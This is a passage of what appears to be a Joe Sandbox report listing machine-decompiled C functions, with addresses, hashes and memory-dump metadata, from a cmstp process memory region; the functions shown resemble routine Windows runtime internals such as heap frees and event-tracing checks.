					E050EFFB0(0x51c86ac, _t28, 0x51c86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E050EFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x051a401a
0x051a401e
0x051a4023
0x051a4028
0x051a4029
0x051a402b
0x051a402f
0x051a4043
0x051a4046
0x051a4051
0x051a4057
0x051a405f
0x051a4062
0x051a4067
0x051a406f
0x051a407c
0x051a407c
0x051a408c
0x051a408c
0x051a4097

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25148568e5e3f31211ee3080776e9a3c987a0648d8f6948ef5eb925b87e3953e
Instruction ID: 5417bb08a2a0a6d0dd63692ba437098c776208bc89d3609f228907551cbfc98f
Opcode Fuzzy Hash: 25148568e5e3f31211ee3080776e9a3c987a0648d8f6948ef5eb925b87e3953e
Instruction Fuzzy Hash: 390184723016457FD651AB79DE84E9BF7ACFF65650B000229F60883A51DB64EC11C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 051914FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E051914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x51cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0511FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E050F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0511B640(E05119AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x051914fb
0x051914fb
0x0519150a
0x05191514
0x05191519
0x0519151b
0x05191526
0x0519152c
0x05191534
0x05191537
0x0519153a
0x05191545
0x05191557
0x05191547
0x05191550
0x05191550
0x05191562
0x05191563
0x05191565
0x0519156a
0x0519157f

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d7f3a9f0de57ea73e7b4a0c2d1053fe36a9bedc9e6bd0050c22fdda9765e40
Instruction ID: 64b58cfac97f26ed620d030512c2378c3a953087147dafdeb3f3f3a58d96958a
Opcode Fuzzy Hash: 06d7f3a9f0de57ea73e7b4a0c2d1053fe36a9bedc9e6bd0050c22fdda9765e40
Instruction Fuzzy Hash: 9F01F170A00248AFDB04DFA8D806EAEBBB8EF44300F004066FD14EB380DB74DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0519138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0519138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x51cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0511FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E050F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0511B640(E05119AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0519138a
0x0519138a
0x05191399
0x051913a3
0x051913a8
0x051913aa
0x051913b5
0x051913bb
0x051913c3
0x051913c6
0x051913c9
0x051913d4
0x051913e6
0x051913d6
0x051913df
0x051913df
0x051913f1
0x051913f2
0x051913f4
0x051913f9
0x0519140e

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76de90b3319a6fbce62f786b667a9e9aeb6037a34215761f15083c677fc4f570
Instruction ID: 4705184c39c6bcf0772202385b870125bba0129024d4e2772bca312791d1e87e
Opcode Fuzzy Hash: 76de90b3319a6fbce62f786b667a9e9aeb6037a34215761f15083c677fc4f570
Instruction Fuzzy Hash: 04019E71E40218AFCB14DFA8D846EAEBBB8EF44710F404066B904EB281DB74AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 050D58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E050D58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x51cd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x50b5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E050D5943() != 0 &&  *0x51c5320 > 5) {
					E05157B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05157B5E( &_v28, _t28);
					_t11 = E05157B9C(0x51c5320, 0x50bbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0511B640(_t11, _t17, _v8 ^ _t29, 0x50bbf15, _t27, _t28);
			}

0x050d58fb
0x050d58fe
0x050d5906
0x050d590a
0x050d593c
0x050d593c
0x050d590c
0x050d590c
0x050d5911
0x00000000
0x050d5913
0x050d5913
0x050d5913
0x050d5911
0x050d591d
0x05131035
0x0513103c
0x0513103f
0x05131056
0x05131056
0x050d593b

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 989a0a9733a0ef24c45784b8499bc20573032efc7daa1f67b55391eb98bf76a9
Instruction ID: 791652f6feb4ec5756646ea045f146d033559bf27eb3a8f5008a17ea3ed39b12
Opcode Fuzzy Hash: 989a0a9733a0ef24c45784b8499bc20573032efc7daa1f67b55391eb98bf76a9
Instruction Fuzzy Hash: 0201F731B04204EBD714DA28EC459BFFBB9EF40170F8500A9AC05A7281EF31ED02CA64

Uniqueness

Uniqueness Score: -1.00%

Function 05191751 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E05191751(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t17;
				signed char* _t18;
				intOrPtr _t24;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t36;

				_t29 = __edx;
				_t24 = __ebx;
				_v8 =  *0x51cd360 ^ _t36;
				_t31 = __edx;
				_t34 = __ecx;
				E0511FA60( &_v52, 0, 0x2c);
				_v20 = _t34;
				_v46 = 0x103a;
				_v16 = _t31;
				_v12 = _a4;
				_t17 = E050F7D50();
				_t32 = _t30;
				_t35 = _t33;
				if(_t17 == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0511B640(E05119AE0(), _t24, _v8 ^ _t36, _t29, _t32, _t35);
			}

0x05191751
0x05191751
0x05191760
0x0519176a
0x0519176f
0x05191771
0x0519177b
0x05191781
0x05191788
0x0519178b
0x0519178e
0x05191793
0x05191794
0x05191797
0x051917a9
0x05191799
0x051917a2
0x051917a2
0x051917b4
0x051917b5
0x051917b7
0x051917bc
0x051917cf

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda38b0168630ef79f2c0f790bdb89255b65205ca1d1b715bddcc437506658bf
Instruction ID: 574b5a821441c64543fc40dac67e66c47dde6e84d6db8871d27a65856c599d08
Opcode Fuzzy Hash: eda38b0168630ef79f2c0f790bdb89255b65205ca1d1b715bddcc437506658bf
Instruction Fuzzy Hash: A6018475B50218ABDB14EBA5E809EAFBBB8EF84700F044066F905EB281DA749901C794

Uniqueness

Uniqueness Score: -1.00%

Function 0518FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0518FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x51cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0511FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E050F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0511B640(E05119AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0518fe3f
0x0518fe3f
0x0518fe4e
0x0518fe58
0x0518fe5d
0x0518fe5f
0x0518fe6a
0x0518fe72
0x0518fe75
0x0518fe78
0x0518fe83
0x0518fe95
0x0518fe85
0x0518fe8e
0x0518fe8e
0x0518fea0
0x0518fea1
0x0518fea3
0x0518fea8
0x0518febd

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e059aef7530f7df910464f33ec7cbf7ed38bed1e0f1d512f555ee5ca850d75f9
Instruction ID: 14913d34de77edf3817125e8540c75ae684eec691c61529b2340b50bb038324d
Opcode Fuzzy Hash: e059aef7530f7df910464f33ec7cbf7ed38bed1e0f1d512f555ee5ca850d75f9
Instruction Fuzzy Hash: 6D018871B04258ABD714DF69D845FAEBBB8EF44710F004066B9009B281DA749941C795

Uniqueness

Uniqueness Score: -1.00%

Function 0518FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0518FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x51cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0511FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E050F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0511B640(E05119AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0518fec0
0x0518fec0
0x0518fecf
0x0518fed9
0x0518fede
0x0518fee0
0x0518feeb
0x0518fef3
0x0518fef6
0x0518fef9
0x0518ff04
0x0518ff16
0x0518ff06
0x0518ff0f
0x0518ff0f
0x0518ff21
0x0518ff22
0x0518ff24
0x0518ff29
0x0518ff3e

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861d70100e9196132d7ba57c0663cadd1da0671083a1f472827424123be254d6
Instruction ID: 714a998cae57d05513421bd33b3ff227f2756a9e69efec1e83cb0f204a1b8f74
Opcode Fuzzy Hash: 861d70100e9196132d7ba57c0663cadd1da0671083a1f472827424123be254d6
Instruction Fuzzy Hash: 0101D871A00248ABC714DB68E845FAEBBB8EF45700F004066B9009B281DA349941C794

Uniqueness

Uniqueness Score: -1.00%

Function 050EB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E050F7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05157016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x050eb037
0x050eb039
0x050eb03b
0x050eb040
0x0513a60e
0x00000000
0x00000000
0x0513a61d
0x050eb04b
0x050eb04e
0x0513a627
0x0513a634
0x00000000
0x00000000
0x0513a641
0x0513a653
0x0513a643
0x0513a64c
0x0513a64c
0x0513a65b
0x00000000
0x00000000
0x00000000
0x0513a66c
0x050eb057
0x050eb057
0x050eb057
0x050eb046
0x050eb046
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: d43c86d3d5735f14602b745a146764dff0323b3b18cf2fc19fe0e32314d234d4
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: E5017C72205984DFD336C75CD998F7A77E9FF45650F1900A1EA2ACBAA1D728EC40C621

Uniqueness

Uniqueness Score: -1.00%

Function 051A1074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E051A1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E051A165E(__ebx, 0x51c8ae4, (__edx -  *0x51c8b04 >> 0x14) + (__edx -  *0x51c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x51c8b04 >> 0x14) + (__edx -  *0x51c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0519AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E050F7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0518FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x051a1074
0x051a1080
0x051a1082
0x051a108a
0x051a108f
0x051a1093
0x051a10ab
0x051a10ab
0x051a10c3
0x051a10cf
0x051a10e1
0x051a10d1
0x051a10da
0x051a10da
0x051a10e9
0x051a10f5
0x051a10f5
0x051a10fe

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453c6cce8d3b376002570d58b244d82c81e31e7dd5659859bea7cf0c7a8bdaa5
Instruction ID: 43dced2c706820b49cd36b398a9f2ec5472f84182859da1c4a7f91fd1d15501e
Opcode Fuzzy Hash: 453c6cce8d3b376002570d58b244d82c81e31e7dd5659859bea7cf0c7a8bdaa5
Instruction Fuzzy Hash: 07012477648741AFC712EF28CA44B1ABBE5BB84210F048629F88683691EF35D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 051A8ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E051A8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x51cd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E050F7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0511B640(E05119AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x051a8ed6
0x051a8ee5
0x051a8eed
0x051a8ef0
0x051a8efa
0x051a8f03
0x051a8f0c
0x051a8f15
0x051a8f24
0x051a8f27
0x051a8f31
0x051a8f43
0x051a8f33
0x051a8f3c
0x051a8f3c
0x051a8f4e
0x051a8f4f
0x051a8f51
0x051a8f56
0x051a8f69

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63e34ec63148f0a76fe493df975d8d0ec8838fb7b39d32c0496333a94f4c971
Instruction ID: 2149a9c22ed225cc57d41400cd8c307e8962a3dde42cae920cdd6e59446a8245
Opcode Fuzzy Hash: e63e34ec63148f0a76fe493df975d8d0ec8838fb7b39d32c0496333a94f4c971
Instruction Fuzzy Hash: 93111271A042599FD704DFA8D445BADBBF4FF08300F0442B6E919EB782D7349940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 051A8A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E051A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x51cd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E050F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0511B640(E05119AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x051a8a62
0x051a8a71
0x051a8a79
0x051a8a82
0x051a8a85
0x051a8a89
0x051a8a8c
0x051a8a8f
0x051a8a92
0x051a8a95
0x051a8a9f
0x051a8ab1
0x051a8aa1
0x051a8aaa
0x051a8aaa
0x051a8abc
0x051a8abd
0x051a8abf
0x051a8ac4
0x051a8ada

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b539227d21201c53317c44a7ff31b1780b92ee24b7937990151bd24f7863807
Instruction ID: 44ef68df04ec8cbd3b9c163f40215d24ff01f5ae9002d6e10a84e2df88dfa2d9
Opcode Fuzzy Hash: 2b539227d21201c53317c44a7ff31b1780b92ee24b7937990151bd24f7863807
Instruction Fuzzy Hash: 57011EB6A00218AFCB04DFA9D9459AEBBB8FF48310F10406AF905E7341D734A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 050DDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050DDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E050DDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E050DE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L050DE8B0(__ecx, _t14, 0xfff);
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x050ddb64
0x050ddb66
0x050ddb6b
0x050ddbaa
0x050ddb71
0x050ddb76
0x050ddb7a
0x050ddba3
0x050ddb7c
0x050ddb87
0x050ddb8b
0x05134fa1
0x05134fb3
0x05134fb8
0x050ddb91
0x050ddb96
0x050ddb98
0x050ddb98
0x050ddb8b
0x050ddb7a
0x050ddb9d
0x050ddba2

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 6176ce9cb2ca9c46e6790780e72d4c85686bcf68ca8f0dce9c4295396d6b06a2
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 8CF0F633345722DBD7326A59A894FAFF69A9FD1A74F160035F2059B344CAA09C028BF1

Uniqueness

Uniqueness Score: -1.00%

Function 050DB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E050F7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E050F7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05157016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x050db1e8
0x050db1ea
0x050db1f3
0x05134a17
0x050db1f9
0x050db1f9
0x050db1f9
0x050db201
0x05134a21
0x05134a2e
0x00000000
0x00000000
0x05134a3b
0x05134a4d
0x05134a3d
0x05134a46
0x05134a46
0x05134a55
0x00000000
0x00000000
0x00000000
0x050db20a
0x050db20a
0x050db20a
0x050db20a

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
